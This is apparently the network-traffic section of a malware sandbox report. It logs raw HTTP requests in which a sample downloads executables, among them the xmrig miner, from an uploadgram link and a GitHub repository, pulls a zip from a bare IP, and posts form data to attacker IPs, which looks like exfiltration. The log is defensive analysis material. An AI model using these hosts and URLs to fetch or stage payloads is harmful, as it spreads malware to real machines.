Network Analysis

GET /62f0d0bc546feh?raw HTTP/1.1 Host: dl.uploadgram.me Connection: Keep-Alive

HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 13 Aug 2022 11:36:00 GMT Content-Type: application/x-ms-dos-executable Content-Length: 73216 Connection: keep-alive cache-control: max-age=31556926 content-transfer-encoding: Binary accept-ranges: bytes content-disposition: attachment; filename="MainModule.exe"; filename*=utf-8''MainModule.exe x-frame-options: SAMEORIGIN x-robots-tag: noindex

GET /BardBax/xyi/blob/main/Task24Watch.exe?raw=true HTTP/1.1 Host: github.com Connection: Keep-Alive

HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 13 Aug 2022 11:36:08 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With permissions-policy: interest-cohort=() Location: https://github.com/BardBax/xyi/raw/main/Task24Watch.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors" Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/ Set-Cookie: _gh_sess=rbafQxxL8VBFpGqHxJcanDz7pCCVzxIaM1i%2B2S6UNMd7zjswxtfs%2BrmlQ%2BRbfuhw0R%2FdwxsTewhPmBum9bjBWRxOq7BfkOn9%2BT%2Fq090YeIaN9SL7%2Fd1GKd9bkXdaq%2B%2F2JaUILPWcQZhs1%2F%2B4gHEi6Zubw6o06f5rdvzURAAlXO%2FMH3Slz51Uasvz9QknOutlFuXcIVhlLYKRPBt8NTMoCtnmJ0Q4TsZ0sMyOCRih0qtR5A6In2Ik3R4sC2ZNSJIKr6hn79GHtIje6draqXWo%2Fw%3D%3D--0vCDDVgnBQg5f83o--l8gcBRHHjOT%2FVs338A%2BFOg%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax Set-Cookie: _octo=GH1.1.996876656.1660390568; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:08 GMT; Secure; SameSite=Lax Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:08 GMT; HttpOnly; Secure; SameSite=Lax Content-Length: 0 X-GitHub-Request-Id: C06A:086B:24562:1A198F:62F78CA8

GET /BardBax/xyi/raw/main/Task24Watch.exe HTTP/1.1 Host: github.com

HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 13 Aug 2022 11:36:09 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With permissions-policy: interest-cohort=() Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors" Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/ Content-Length: 0 X-GitHub-Request-Id: C06A:086B:24563:1A1993:62F78CA8

GET /BardBax/xyi/main/Task24Watch.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Content-Length: 974336 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "34a8dafa0dc2efc62641dd80e6906414ad939d96a310e5f87d632c065a0ea68e" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: E332:2A13:58202:154793:62F77209 Accept-Ranges: bytes Date: Sat, 13 Aug 2022 11:36:09 GMT Via: 1.1 varnish X-Served-By: cache-icn1450021-ICN X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1660390569.159945,VS0,VE217 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: c3666546a999e576ac680a43fa2707a539e469ec Expires: Sat, 13 Aug 2022 11:41:09 GMT Source-Age: 0

GET /BardBax/xyi/blob/main/xmrig.exe?raw=true HTTP/1.1 Host: github.com Connection: Keep-Alive

HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 13 Aug 2022 11:36:28 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With permissions-policy: interest-cohort=() Location: https://github.com/BardBax/xyi/raw/main/xmrig.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors" Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/ Set-Cookie: _gh_sess=KWIplv5YW5hTuPCfELapKIyhjjDnSOulmRg%2FTYZL%2B%2BWEmcQDL4OWzi9yrUPCcG30Mv1ZC9ldbr7G7nJCJRkFhljVJkFoSoj09dtdlKgQ7lLLr7r8wZKDD3WN2kbbXRWq%2BgStlb8y%2FagPyDz7VvEW%2B1iHUYtOGhh7%2BtRzEWSr%2F3GlOMfEegz4KtcGxUcaa6STSlD7XpRKo%2FFFNBiYw90AmSleejGJIup7Imag7pSj%2F3MTd3mPT%2FhBMQTpctP8sbV9qJ6%2F3%2FKBCPOufj6RsCNR8w%3D%3D--Asr2NKr4xwz8tkzX--EZD2gwKyl6tvmA8ElC3P%2BQ%3D%3D; Path=/; HttpOnly; Secure; SameSite=Lax Set-Cookie: _octo=GH1.1.1638893445.1660390588; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:28 GMT; Secure; SameSite=Lax Set-Cookie: logged_in=no; Path=/; Domain=github.com; Expires=Sun, 13 Aug 2023 11:36:28 GMT; HttpOnly; Secure; SameSite=Lax Content-Length: 0 X-GitHub-Request-Id: C087:5243:522D03:810D37:62F78CBC

GET /BardBax/xyi/raw/main/xmrig.exe HTTP/1.1 Host: github.com

HTTP/1.1 302 Found Server: GitHub.com Date: Sat, 13 Aug 2022 11:36:29 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With permissions-policy: interest-cohort=() Access-Control-Allow-Origin: https://render.githubusercontent.com Location: https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors" Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com cdn.optimizely.com logx.optimizely.com/v1/events *.actions.githubusercontent.com wss://*.actions.githubusercontent.com online.visualstudio.com/api/v1/locations github-production-repository-image-32fea6.s3.amazonaws.com github-production-release-asset-2e65be.s3.amazonaws.com insights.github.com wss://alive.github.com; font-src github.githubassets.com; form-action 'self' github.com gist.github.com objects-origin.githubusercontent.com; frame-ancestors 'none'; frame-src render.githubusercontent.com viewscreen.githubusercontent.com notebooks.githubusercontent.com; img-src 'self' data: github.githubassets.com identicons.github.com github-cloud.s3.amazonaws.com secured-user-images.githubusercontent.com/ github-production-user-asset-6210df.s3.amazonaws.com customer-stories-feed.github.com spotlights-feed.github.com *.githubusercontent.com; manifest-src 'self'; media-src github.com user-images.githubusercontent.com/ secured-user-images.githubusercontent.com/; script-src github.githubassets.com; style-src 'unsafe-inline' github.githubassets.com; worker-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/ Content-Length: 0 X-GitHub-Request-Id: C087:5243:522D10:810D49:62F78CBC

GET /BardBax/xyi/main/xmrig.exe HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive

HTTP/1.1 200 OK Connection: keep-alive Content-Length: 5389312 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "96407b957cce48a97dbf27172a9a863c3d65745ff03a14d4d01ddcf52480ca56" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 829C:0B03:7365:5F03A:62F7721B Accept-Ranges: bytes Date: Sat, 13 Aug 2022 11:36:29 GMT Via: 1.1 varnish X-Served-By: cache-icn1450048-ICN X-Cache: HIT X-Cache-Hits: 0 X-Timer: S1660390589.183516,VS0,VE278 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: ae9652b066a442fbe482e824c072de2d32da07ba Expires: Sat, 13 Aug 2022 11:41:29 GMT Source-Age: 0

GET /1571 HTTP/1.1 Host: 45.159.248.173

HTTP/1.1 200 OK Server: nginx Date: Sat, 13 Aug 2022 11:35:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /3137953174.zip HTTP/1.1 Host: 45.159.248.173 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Sat, 13 Aug 2022 11:35:31 GMT Content-Type: application/zip Content-Length: 3642574 Last-Modified: Mon, 04 Jul 2022 10:49:28 GMT Connection: keep-alive ETag: "62c2c5b8-3794ce" Accept-Ranges: bytes

POST / HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=utf-8 User-Agent: mozzzzzzzzzzz Host: 193.56.146.177 Content-Length: 95 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 13 Aug 2022 11:35:41 GMT Content-Type: text/html; charset=utf-8 Content-Length: 5339 Connection: keep-alive Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Content-Security-Policy: default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin X-DNS-Prefetch-Control: off Expect-CT: max-age=0 X-Frame-Options: SAMEORIGIN Strict-Transport-Security: max-age=15552000; includeSubDomains X-Download-Options: noopen X-Content-Type-Options: nosniff Origin-Agent-Cluster: ?1 X-Permitted-Cross-Domain-Policies: none Referrer-Policy: no-referrer X-XSS-Protection: 0 ETag: W/"14db-8p2h3NzQKmBAAjk8oDOYrKzutxE"

POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----3715594587533448 Host: 45.159.248.173 Content-Length: 49430 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx Date: Sat, 13 Aug 2022 11:35:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Mon, 20 Jun 2022 20:24:00 GMT ETag: "37d-5e1e6e25c9800" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Sat, 13 Aug 2022 12:36:00 GMT Date: Sat, 13 Aug 2022 11:36:00 GMT Connection: keep-alive

GET /IE9CompatViewList.xml HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: ie9cvlist.ie.microsoft.com If-Modified-Since: Fri, 16 Oct 2020 17:54:09 GMT If-None-Match: 0x8D871FC7BDF491D Connection: Keep-Alive

HTTP/1.1 200 OK Content-Encoding: gzip Age: 8023 Cache-Control: max-age=21600 Content-MD5: p9g4jsuZO6TaLMVAI9ujVg== Content-Type: text/xml Date: Sat, 13 Aug 2022 11:36:28 GMT Etag: 0x8D9521D2D2DF1EC Last-Modified: Wed, 28 Jul 2021 23:12:31 GMT Server: ECAcc (tka/897A) Vary: Accept-Encoding X-Cache: HIT x-ms-blob-type: BlockBlob x-ms-lease-status: unlocked x-ms-request-id: ead25f45-c01e-00bf-31f6-aef974000000 x-ms-version: 2009-09-19 Content-Length: 13702